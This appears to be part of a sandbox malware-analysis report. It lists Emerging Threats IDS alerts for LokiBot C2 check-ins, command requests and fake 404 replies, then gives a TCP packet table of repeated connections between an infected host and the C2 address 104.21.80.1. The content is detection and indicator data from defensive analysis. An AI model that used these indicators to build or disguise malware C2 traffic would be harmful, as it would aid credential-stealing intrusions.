2025-02-20T15:07:55.591383+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50029	104.21.80.1	80	TCP
2025-02-20T15:07:55.596523+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50029	TCP
2025-02-20T15:07:56.772588+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50030	104.21.80.1	80	TCP
2025-02-20T15:07:56.772588+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50030	104.21.80.1	80	TCP
2025-02-20T15:07:56.772588+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50030	104.21.80.1	80	TCP
2025-02-20T15:07:57.503817+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50030	104.21.80.1	80	TCP
2025-02-20T15:07:58.679413+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50031	104.21.80.1	80	TCP
2025-02-20T15:07:58.679413+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50031	104.21.80.1	80	TCP
2025-02-20T15:07:58.679413+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50031	104.21.80.1	80	TCP
2025-02-20T15:07:59.610783+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50031	104.21.80.1	80	TCP
2025-02-20T15:07:59.615829+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50031	TCP
2025-02-20T15:08:00.794678+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50032	104.21.80.1	80	TCP
2025-02-20T15:08:00.794678+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50032	104.21.80.1	80	TCP
2025-02-20T15:08:00.794678+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50032	104.21.80.1	80	TCP
2025-02-20T15:08:01.538370+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50032	104.21.80.1	80	TCP
2025-02-20T15:08:02.738306+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50033	104.21.80.1	80	TCP
2025-02-20T15:08:02.738306+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50033	104.21.80.1	80	TCP
2025-02-20T15:08:02.738306+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50033	104.21.80.1	80	TCP
2025-02-20T15:08:03.583169+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50033	104.21.80.1	80	TCP
2025-02-20T15:08:03.588220+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50033	TCP
2025-02-20T15:08:04.747632+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50034	104.21.80.1	80	TCP
2025-02-20T15:08:04.747632+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50034	104.21.80.1	80	TCP
2025-02-20T15:08:04.747632+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50034	104.21.80.1	80	TCP
2025-02-20T15:08:05.508007+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50034	104.21.80.1	80	TCP
2025-02-20T15:08:05.513428+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50034	TCP
2025-02-20T15:08:06.689667+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50036	104.21.80.1	80	TCP
2025-02-20T15:08:06.689667+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50036	104.21.80.1	80	TCP
2025-02-20T15:08:06.689667+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50036	104.21.80.1	80	TCP
2025-02-20T15:08:07.579901+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50036	104.21.80.1	80	TCP
2025-02-20T15:08:07.584891+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50036	TCP
2025-02-20T15:08:08.766512+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50037	104.21.80.1	80	TCP
2025-02-20T15:08:08.766512+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50037	104.21.80.1	80	TCP
2025-02-20T15:08:08.766512+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50037	104.21.80.1	80	TCP
2025-02-20T15:08:09.585159+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50037	104.21.80.1	80	TCP
2025-02-20T15:08:10.754452+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50038	104.21.80.1	80	TCP
2025-02-20T15:08:10.754452+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50038	104.21.80.1	80	TCP
2025-02-20T15:08:10.754452+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50038	104.21.80.1	80	TCP
2025-02-20T15:08:11.587148+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50038	104.21.80.1	80	TCP
2025-02-20T15:08:11.592353+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50038	TCP
2025-02-20T15:08:12.769111+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50039	104.21.80.1	80	TCP
2025-02-20T15:08:12.769111+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50039	104.21.80.1	80	TCP
2025-02-20T15:08:12.769111+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50039	104.21.80.1	80	TCP
2025-02-20T15:08:13.585877+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50039	104.21.80.1	80	TCP
2025-02-20T15:08:13.590884+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50039	TCP
2025-02-20T15:08:14.749379+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50040	104.21.80.1	80	TCP
2025-02-20T15:08:14.749379+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50040	104.21.80.1	80	TCP
2025-02-20T15:08:14.749379+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50040	104.21.80.1	80	TCP
2025-02-20T15:08:15.626305+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50040	104.21.80.1	80	TCP
2025-02-20T15:08:15.632064+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50040	TCP
2025-02-20T15:08:16.794399+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50041	104.21.80.1	80	TCP
2025-02-20T15:08:16.794399+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50041	104.21.80.1	80	TCP
2025-02-20T15:08:16.794399+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50041	104.21.80.1	80	TCP
2025-02-20T15:08:17.605130+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50041	104.21.80.1	80	TCP
2025-02-20T15:08:17.610736+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50041	TCP
2025-02-20T15:08:18.771827+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50042	104.21.80.1	80	TCP
2025-02-20T15:08:18.771827+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50042	104.21.80.1	80	TCP
2025-02-20T15:08:18.771827+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50042	104.21.80.1	80	TCP
2025-02-20T15:08:19.519832+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50042	104.21.80.1	80	TCP
2025-02-20T15:08:20.704781+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50043	104.21.80.1	80	TCP
2025-02-20T15:08:20.704781+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50043	104.21.80.1	80	TCP
2025-02-20T15:08:20.704781+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50043	104.21.80.1	80	TCP
2025-02-20T15:08:21.480011+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50043	104.21.80.1	80	TCP
2025-02-20T15:08:22.688183+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50044	104.21.80.1	80	TCP
2025-02-20T15:08:22.688183+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50044	104.21.80.1	80	TCP
2025-02-20T15:08:22.688183+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50044	104.21.80.1	80	TCP
2025-02-20T15:08:23.425796+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50044	104.21.80.1	80	TCP
2025-02-20T15:08:24.585638+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50045	104.21.80.1	80	TCP
2025-02-20T15:08:24.585638+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50045	104.21.80.1	80	TCP
2025-02-20T15:08:24.585638+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50045	104.21.80.1	80	TCP
2025-02-20T15:08:25.336034+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50045	104.21.80.1	80	TCP
2025-02-20T15:08:26.526444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50046	104.21.80.1	80	TCP
2025-02-20T15:08:26.526444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50046	104.21.80.1	80	TCP
2025-02-20T15:08:26.526444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50046	104.21.80.1	80	TCP
2025-02-20T15:08:27.274514+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50046	104.21.80.1	80	TCP
2025-02-20T15:08:28.437803+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50047	104.21.80.1	80	TCP
2025-02-20T15:08:28.437803+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50047	104.21.80.1	80	TCP
2025-02-20T15:08:28.437803+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50047	104.21.80.1	80	TCP
2025-02-20T15:08:29.245218+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50047	104.21.80.1	80	TCP
2025-02-20T15:08:29.252883+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50047	TCP
2025-02-20T15:08:30.447083+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50048	104.21.80.1	80	TCP
2025-02-20T15:08:30.447083+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50048	104.21.80.1	80	TCP
2025-02-20T15:08:30.447083+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50048	104.21.80.1	80	TCP
2025-02-20T15:08:31.241230+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50048	104.21.80.1	80	TCP
2025-02-20T15:08:31.246274+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50048	TCP
2025-02-20T15:08:32.416537+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50049	104.21.80.1	80	TCP
2025-02-20T15:08:32.416537+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50049	104.21.80.1	80	TCP
2025-02-20T15:08:32.416537+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50049	104.21.80.1	80	TCP
2025-02-20T15:08:33.261508+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50049	104.21.80.1	80	TCP
2025-02-20T15:08:33.268248+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50049	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 20, 2025 15:06:30.068733931 CET	49710	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:30.073817015 CET	80	49710	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:30.073896885 CET	49710	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:30.076369047 CET	49710	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:30.081331015 CET	80	49710	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:30.081384897 CET	49710	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:30.086371899 CET	80	49710	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:30.962362051 CET	80	49710	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:30.962591887 CET	49710	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:30.962652922 CET	80	49710	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:30.962701082 CET	49710	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:30.967591047 CET	80	49710	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.102322102 CET	49711	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.107428074 CET	80	49711	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.107503891 CET	49711	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.109662056 CET	49711	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.114609957 CET	80	49711	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.114665985 CET	49711	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.119652033 CET	80	49711	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.871561050 CET	80	49711	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.871846914 CET	49711	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.872148037 CET	80	49711	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.872277021 CET	49711	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.877037048 CET	80	49711	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.959515095 CET	49712	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.964884043 CET	80	49712	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.966557980 CET	49712	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.968614101 CET	49712	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.973716974 CET	80	49712	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:32.976600885 CET	49712	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:32.981683969 CET	80	49712	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:33.744920969 CET	80	49712	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:33.745178938 CET	49712	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:33.745444059 CET	80	49712	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:33.745532990 CET	49712	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:33.750252962 CET	80	49712	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:34.899348021 CET	49719	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:34.904576063 CET	80	49719	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:34.904690981 CET	49719	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:34.906991959 CET	49719	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:34.911984921 CET	80	49719	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:34.912048101 CET	49719	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:34.917037964 CET	80	49719	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:35.752793074 CET	80	49719	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:35.752990007 CET	49719	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:35.753572941 CET	80	49719	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:35.753637075 CET	49719	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:35.758106947 CET	80	49719	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:36.940994024 CET	49730	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:36.946119070 CET	80	49730	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:36.946465015 CET	49730	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:37.012134075 CET	49730	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:37.017088890 CET	80	49730	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:37.017142057 CET	49730	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:37.022114992 CET	80	49730	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:37.735495090 CET	80	49730	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:37.735651016 CET	49730	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:37.736393929 CET	80	49730	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:37.736445904 CET	49730	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:37.740650892 CET	80	49730	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:38.901504993 CET	49747	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:38.907427073 CET	80	49747	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:38.907550097 CET	49747	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:38.910187960 CET	49747	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:38.915869951 CET	80	49747	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:38.915988922 CET	49747	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:38.921504021 CET	80	49747	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:39.690026045 CET	80	49747	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:39.690279961 CET	49747	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:39.690890074 CET	80	49747	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:39.690952063 CET	49747	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:39.695365906 CET	80	49747	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:40.836311102 CET	49758	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:40.841384888 CET	80	49758	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:40.841456890 CET	49758	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:40.843333006 CET	49758	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:40.848336935 CET	80	49758	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:40.848385096 CET	49758	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:40.853355885 CET	80	49758	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:41.667829037 CET	80	49758	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:41.668215990 CET	80	49758	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:41.668277979 CET	49758	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:41.752072096 CET	49758	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:41.757122040 CET	80	49758	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:43.026165962 CET	49774	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:43.031168938 CET	80	49774	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:43.031306028 CET	49774	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:43.033180952 CET	49774	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:43.038151026 CET	80	49774	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:43.038217068 CET	49774	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:43.043231964 CET	80	49774	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:43.754199982 CET	80	49774	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:43.754362106 CET	49774	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:43.754959106 CET	80	49774	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:43.755021095 CET	49774	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:43.759408951 CET	80	49774	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:44.910207033 CET	49789	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:44.915215015 CET	80	49789	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:44.915285110 CET	49789	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:44.917458057 CET	49789	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:44.922455072 CET	80	49789	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:44.922528982 CET	49789	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:44.927480936 CET	80	49789	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:45.774863005 CET	80	49789	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:45.774987936 CET	49789	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:45.775494099 CET	80	49789	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:45.775556087 CET	49789	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:45.780148983 CET	80	49789	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:46.914067984 CET	49806	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:47.025657892 CET	80	49806	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:47.025762081 CET	49806	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:47.027575970 CET	49806	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:47.032624006 CET	80	49806	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:47.032685041 CET	49806	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:47.037769079 CET	80	49806	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:47.888678074 CET	80	49806	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:47.888814926 CET	49806	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:47.889416933 CET	80	49806	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:47.889718056 CET	49806	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:47.894768000 CET	80	49806	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:49.040064096 CET	49820	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:49.045224905 CET	80	49820	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:49.045365095 CET	49820	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:49.047439098 CET	49820	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:49.052484035 CET	80	49820	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:49.052568913 CET	49820	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:49.057621956 CET	80	49820	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:49.874043941 CET	80	49820	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:49.874209881 CET	49820	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:49.875224113 CET	80	49820	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:49.875302076 CET	49820	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:49.879296064 CET	80	49820	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:51.038772106 CET	49834	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:51.043886900 CET	80	49834	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:51.043993950 CET	49834	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:51.045958996 CET	49834	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:51.051022053 CET	80	49834	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:51.051090002 CET	49834	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:51.056117058 CET	80	49834	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:51.783653021 CET	80	49834	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:51.783915043 CET	49834	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:51.784218073 CET	80	49834	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:51.784288883 CET	49834	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:51.788996935 CET	80	49834	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:52.932878971 CET	49847	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:52.938209057 CET	80	49847	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:52.938303947 CET	49847	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:52.941293001 CET	49847	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:52.946726084 CET	80	49847	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:52.946795940 CET	49847	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:52.952274084 CET	80	49847	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:53.857409000 CET	80	49847	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:53.857547998 CET	49847	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:53.857557058 CET	80	49847	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:53.857620001 CET	49847	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:53.862663984 CET	80	49847	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:55.008567095 CET	49859	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:55.013808966 CET	80	49859	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:55.013951063 CET	49859	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:55.016930103 CET	49859	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:55.022051096 CET	80	49859	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:55.022125006 CET	49859	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:55.027405977 CET	80	49859	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:55.803777933 CET	80	49859	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:55.803836107 CET	80	49859	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:55.803929090 CET	49859	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:55.839901924 CET	49859	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:55.844991922 CET	80	49859	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:57.222189903 CET	49872	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:57.227291107 CET	80	49872	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:57.229572058 CET	49872	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:57.231378078 CET	49872	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:57.236484051 CET	80	49872	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:57.236547947 CET	49872	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:57.241615057 CET	80	49872	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:58.021136045 CET	80	49872	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:58.021941900 CET	80	49872	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:58.022032976 CET	49872	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:58.022090912 CET	49872	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:58.027100086 CET	80	49872	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:59.179347992 CET	49884	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:59.184372902 CET	80	49884	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:59.184490919 CET	49884	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:59.186620951 CET	49884	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:59.191597939 CET	80	49884	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:59.191948891 CET	49884	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:59.196938038 CET	80	49884	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:59.868896961 CET	80	49884	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:59.869131088 CET	49884	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:06:59.869265079 CET	80	49884	104.21.80.1	192.168.2.6
Feb 20, 2025 15:06:59.869337082 CET	49884	80	192.168.2.6	104.21.80.1
